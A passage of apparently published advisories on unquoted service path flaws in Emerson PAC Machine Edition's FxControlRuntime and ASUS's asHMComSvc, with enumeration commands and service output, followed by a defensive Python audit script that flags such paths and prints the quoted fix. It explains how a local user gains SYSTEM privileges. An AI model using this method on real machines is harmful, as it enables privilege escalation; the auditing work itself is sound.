C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """

FxControl Runtime	FxControlRuntime	C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe	Auto

# Service info:

C:\>sc qc FxControlRuntime
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FxControlRuntime
        TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FxControl Runtime
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
            
# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path
# Date: 2019-11-16
# Exploit Author : Olimpia Saucedo
# Vendor Homepage: www.asus.com
# Version:  1.00.31
# Tested on: Windows 10 Pro x64 (but it should work on all Windows versions)
 
The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities.
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges.
 
POC:

>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

ASUS HM Com Service      asHmComSvc
C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
Auto

>sc qc "asHMComSvc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: asHMComSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ASUS HM Com Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
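The three advisories above (Shrew Soft iked/ipsecd, Emerson FxControlRuntime, ASUS asHMComSvc) all rely on the same weakness: an unquoted BINARY_PATH_NAME containing spaces. The following added audit script (not part of any of the advisories) takes BINARY_PATH_NAME values as reported by sc qc, flags the unquoted ones, lists the directories whose ACLs a defender must check because CreateProcess may try those paths first, and prints the quoted form to set with sc config; the sample paths are constructed from the advisories above, and the quoted_ok and nospace_ok entries are hypothetical controls.

```python
import re

# Constructed sample: BINARY_PATH_NAME values taken from the advisories above,
# plus two hypothetical services that are NOT vulnerable.
SAMPLE_PATHS = {
    "iked": r"C:\Program Files\ShrewSoft\VPN Client\iked.exe -service",
    "FxControlRuntime": r"C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe",
    "asHMComSvc": r"C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe",
    "quoted_ok": r'"C:\Program Files\Vendor\svc.exe" -service',
    "nospace_ok": r"C:\Windows\system32\svchost.exe -k netsvcs",
}

def split_image(binary_path):
    """Return (image_path, arguments, was_quoted) for a service command line."""
    p = binary_path.strip()
    if p.startswith('"'):
        end = p.index('"', 1)
        return p[1:end], p[end + 1:], True
    # Unquoted: the image path runs up to the first ".exe" token.
    m = re.match(r'(.*?\.exe)\b(.*)', p, re.IGNORECASE | re.DOTALL)
    if not m:
        return p, "", False
    return m.group(1), m.group(2), False

def is_unquoted_with_spaces(binary_path):
    image, _, quoted = split_image(binary_path)
    return not quoted and " " in image

def ambiguous_candidates(binary_path):
    """Executables Windows may resolve before the intended image: each
    space-delimited prefix of the path with .exe appended. A defender must
    verify that no unprivileged user can write to the parent directories."""
    image, _, quoted = split_image(binary_path)
    if quoted:
        return []
    parts = image.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def quoted_form(binary_path):
    """Remediation value: wrap the image path in quotes, keep the arguments.
    Apply with: sc config <name> binPath= "\"<image>\" <args>"."""
    image, args, _ = split_image(binary_path)
    return f'"{image}"{args}'

def audit(services):
    """Map each vulnerable service name to its ambiguous lookup paths."""
    return {name: ambiguous_candidates(path)
            for name, path in services.items() if is_unquoted_with_spaces(path)}

if __name__ == "__main__":
    for name, cands in audit(SAMPLE_PATHS).items():
        print(f"[!] {name}: unquoted path; check ACLs for {cands}")
        print(f"    fix -> {quoted_form(SAMPLE_PATHS[name])}")
```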